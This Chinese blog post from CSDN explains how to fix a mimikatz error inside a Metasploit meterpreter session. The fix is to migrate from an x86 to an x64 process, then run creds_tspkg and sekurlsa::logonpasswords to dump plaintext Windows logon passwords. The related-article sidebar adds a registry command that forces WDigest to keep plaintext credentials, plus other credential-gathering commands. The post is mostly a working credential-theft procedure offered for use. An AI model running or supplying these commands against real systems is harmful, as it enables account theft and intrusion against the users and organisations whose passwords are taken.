msf 使用mimikatz获取明文密码过程中报错Retrieving wdigest credentials

最新推荐文章于 2023-12-19 11:44:36 发布
最新推荐文章于 2023-12-19 11:44:36 发布
阅读量1.5k 收藏 3
点赞数 7
分类专栏: msfconsole
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_sweelg/article/details/117480834
版权

首先我使用的kali是2021的

当我们用meterpreter提权成功得到system权限之后

meterpreter > getuid

加载mimikatz

load mimikatz

不论运行什么命令都报错Retrieving wdigest credentials

 

看了别人的方法说用以下命令可以实现

mimikatz_command -f samdump::hashes

其实这是老版本的用法,运行还是会报错

 

当我们加载mimikatz后可以用help来查看使用方法

meterpreter > help

然后又使用以下命令还是无法实现

meterpreter > kiwi_cmd -f sekurlsa::logonpasswords

不过总算找到了原因,mimikatz的x86无法访问x64

getpid和ps查看一下进程

meterpreter > getpid
meterpreter > ps

2600果然在x86下,所以只需要迁移进程到x64下就可以了

meterpreter > migrate 1864

随便找了个迁移到了1864下

 

接下来就能运行mimikatz的所有命令了

meterpreter > creds_tspkg

meterpreter > kiwi_cmd -f sekurlsa::logonpasswords

就能获取到明文密码了

 

 

 

 

Sweelg
关注
专栏目录
MSFmimikatz模块的使用
谢公子的博客
11-10 4110
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块的使用需要Administrator权限或者System权限。MSF自带mimikatz模块,MSFmimikatz 模块同时支...
VisualStudio2010UltimateMSF过程模型的设计
03-23
但不包括UML细节和其他架构概念,并且将看到使用VS2010建模功能的每一个设计过程,其 过程模型是软件工程学的一部分,就好比我们用什么过程方法进行软件“房子”的建设。在本节,我们将对VS2010新提供和架构...
mimikatz获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7290
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
MSF渗透利用木马
nnjnknkj的博客
12-28 907
基于木马的渗透测试
mimikatz的原理,哪个补丁导致了mimikatz无法获取明文密码,如何绕过?
Ping_Pig的博客
11-10 3867
讲在前面: 对于mimikatz的原理本文只通过简单的话语表述,并在文章后给出分析的思路和参考文章。对于绕过补丁,本文只对KB2871997补丁做阐述,并且犹豫对mimikatz的介绍文章非常之多,所以本文只取重点罗列,让读者能够简单快速的明白关键点,深入理解在文章后给出分析思路和参考文章。 mimikazt的原理 注意:本文对mimikatz获取lsass.exe进程明文密码的原理做简单描述。 开发语言:C/C++。 开发初衷:深入学习Windows系统以及C/C++语言。 获取明文密码
mimikatz使用
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-07 398
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。默认配置是抓不到明文密码了,神器mimikatz显示Password为null。第二条:sekurlsa::logonpasswords。第一条:privilege::debug。
【问题记录】防止mimikatz获取明文密码
weixin_43376075的博客
10-19 1170
个人笔记-问题记录-mimikatz
通信与网络MSF基于组件的业务框架
11-14
**MSF基于组件的业务框架概述** MSFMicrosoft Solutions Framework)提出的基于组件的业务框架是一种设计模式,它主要用于通信与网络领域的业务构建。该框架的核心理念是将复杂的业务逻辑分解为可重用的组件,...
基础电子MSF业务框架与IMS的关系
11-14
MSF(Method for System Specification and Development,系统规范与开发方法)是一种在电信行业广泛采用的业务框架,它旨在提供一个高效、结构化的开发过程,以适应不断变化的市场需求和技术创新。MSF的核心是...
元器件应用MSF系列MSF7905集成电路实用检测数据
11-20
MSF7905是一款专用于提供稳定-5V电源的集成电路,常见于电子设备的供电系统。这款芯片设计为三脚单列直插式塑料封装,这使得它易于安装在电路板上,并且占用空间小。在元器件应用MSF7905因其高效能和稳定性而...
元器件应用MSF系列MSF7907集成电路实用检测数据
11-20
MSF7907是-7V电源稳压电路,为3脚单列直插式塑料封装,在索尼HCD-700/V800型VCD影碟机电路IC1004上的正常工作电压典型检测数据如表8所列,用MF14型三用表测得(DC挡)。 表 MSF7907在索尼HCD-700/V800型VCD影碟机...
【已解决】未解决-mimikatz尝试获取win10明文口令报错
热门推荐
高冷的宅先生
04-06 1万+
1.说明 尝试用mimkatz抓取win10明文口令 按照网上的说明,修改了注册表 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 使用时注意各种以管理员运行 使用ProcDump和任务管理器lsass都创建转储文件...
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 3186
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
内网渗透----使用mimikatz获取windows登陆口令
浅笑996的博客
12-01 2046
以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存生成,早期版本的Windows ...
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 7432
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库导出本地用户账号,该命令的使用需要系统权限
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1992
【Metasploit】MSF常用命令
Mimikatz ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
最新发布
BlackNight168的博客
12-19 824
关键进口” 我尝试了早期版本2.1.1 #17763,并运行sekurlsa::logonpasswords就可以了。原文链接:https://blog.csdn.net/u012206617/article/details/129790597。版权声明:本文为CSDN博主「墨痕诉清风」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。从报错信息看,有一个key导致失败了,查了一下github原地址 issue 找到了答案。1. 确定不是权限的问题,已是最高权限。
从外网到域控(vulnstack靶机实战一)
内心不种满鲜花就会长满杂草
10-15 2880
目录 环境搭建 web打点 Yxcms漏洞getshell phpmyadmin后台getshell 1. into outfile写入webshell 2.开启全局日志getshell 3. phpMyAdmin 4.8.x 本地文件包含getshell 横向渗透 vlunstack是红日安全团队出品的一个实战环境,具体介绍及靶机环境下载地址请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境搭建 win7 web服务.
Volatility安装遇到的问题之mimikatz插件安装
qq_42878458的博客
08-23 2566
数字取证学习
利用Beef获取目标主机用户名与密码:实战教程
本资源主要介绍如何在合法研究和测试环境下,通过beef(Browser Exploitation Framework)这一专业的浏览器漏洞利用框架来获取目标主机的用户名和密码,以及利用它进一步获取shell权限。beef结合Metasploit工具,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值